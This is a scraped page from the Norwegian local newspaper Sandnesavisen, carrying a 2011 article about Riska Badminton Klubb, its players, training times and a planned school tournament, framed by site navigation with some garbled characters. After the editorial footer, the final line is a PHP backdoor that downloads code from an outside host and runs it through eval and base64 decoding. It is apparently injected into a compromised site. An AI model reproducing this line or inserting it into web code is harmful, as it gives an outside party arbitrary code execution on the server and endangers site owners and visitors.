Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Badminton, en gentlemansidrett
Skrevet av Tom Gaudland   
fredag 18. mars 2011

 

Datoen er 20. januar 2011. Det står 28-20 i Islands favør i VM-kampen. Islandske Palmasson har satt inn målet, og tørker av seg neseblod. I Norge er det stor oppslutning om"brutale" idretter som håndball, fotball, hockey og alpint skisport. Andre flotte idretter forsvinner ofte bak kjempene.

Badminton, en gentlemansidrett
Vetle Movold, Alexander Helgeland og Christoffer Grøtting er aktive i Riska Babnintonklubb.

Riska Badminton Klubb har siden start i 1993 hatt flere kretsmestere og en junior Norgesmester. Det er vel noe å skryte av for en liten klubb fra et lite samfunn? spør Hans Ananiassen, som er styreleder i den lokale badmintonklubben. Og så har vi en landslagspiller i Ungdom under 23 år som kommer fra bygda. Eirik Paulsen heter han. Vi trener også sammen med en ungdomslandslagspiller fra Sandnes som heter Randi Selle. Vi driver med en idrett som engelskspråklige omtaler som en "gentlemans sport", og hvor det er gode muligheter for dem som trener målbevisst, sier Ananiassen.

Ypperlig for vårt klima
Vi møter en gjeng badmintonglade ungdommer på trening i Riskahallen i vinterferien. Akkurat denne dagen er de 8-10 stykker, men det skyldes ferien.

Ofte er det 30 spillere. Hallen er rett og slett full, sier Hans Ananiassen, som peker på at badminton er en ypperlig idrett på det forblåste vestlandet, ganske enkelt fordi den skal utøves innendørs. Mange har kanskje prøvd seg med hagebadminton, men i hallen er det helt annerledes. Der er forholdene mer kontrollerte. For i badminton er det teknikk, hurtighet, balanse og overblikk som teller. Naturligvis har vi nok utholdenhet til å stå i en lang og hard kamp, og krefter må vi også ha for å slå lange og harde baller, sier den badmintoninteresserte riskabuen. 

Superrask idrett
Badminton sies å være en superrask idrett. På den hurtigste smashen som noen gang er målt, flyr den karakteristiske fjørballen med en fart av 421 km i timen!

Derfor er rask reaksjonsevne nødvendig å trene opp, godt blikk for fjørballens bane, veksling mellom harde, lange slag med korte drops over nettkanten - og plutselige eksplosive slag for å vinne poeng, sett og match. Kort sakt, babminton er en spennende individuell idrett der alle kroppens ledd får trene seg, bevege seg og være smidige. En ekte trimidrett der en får bruke hele kroppen og alle dens muskler, påpeker Ananiassen.

Unge og eldre
Alder ingen hindring, i hvert fall ikke i badminton. I Riska Badminton klubb har man medlemmer fra 9 år til 54 år. Ofte spiller barna sammen med sine foreldre. Og alle kan delta i turneringer. De eldre spillerne er ofte meget gode fordi de har erfaringen, men de unge spillerne er raskere, slår hardere og har bedre kondisjon. Medlemmene strømmer til.

Medlemstallet har begynt å stige igjen, og skal gjerne fortsette til vi når gamle høyder på over 100 medlemmer på det meste. Det vil også bety at vi får mer halltid i Riskahallen. Vi har dyktige trenere som blant annet øver opp slagteknikker, fotarbeid og spille- og kampøvelser. Vi prøver stadig å få flere trenerkrefter trukket til klubben, og håper at vi får Eirik Paulsen til å bruke litt tid på våre ungdommer når han kommer hjem fra Oslo til sommeren. Han vil være til stor inspirasjon, mener Ananiassen.

Turnering til høsten?
Til høsten er planen å stable på beina en skoleturnering.

Det vil være gøy for ungene å få prøve seg med en racket i hånda, og en vennskapelig kamp mot noen i samme alder, mener Ananiassen. Han trekker fram Danmark som eksempel på nasjoner hvor badminton regnes som en "stor" idrett.

De ligger i verdenstoppen sammen med Kina og Indonesia. Vi har tanker om å opprette vennskapsforbindelser til Danmark og kanskje også med England. 

De som har lyst til å prøve seg i badmintonklubben, kan møte opp i Riskahallen mandager kl 1600-1700, samt onsdager kl 1930 til 2100.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));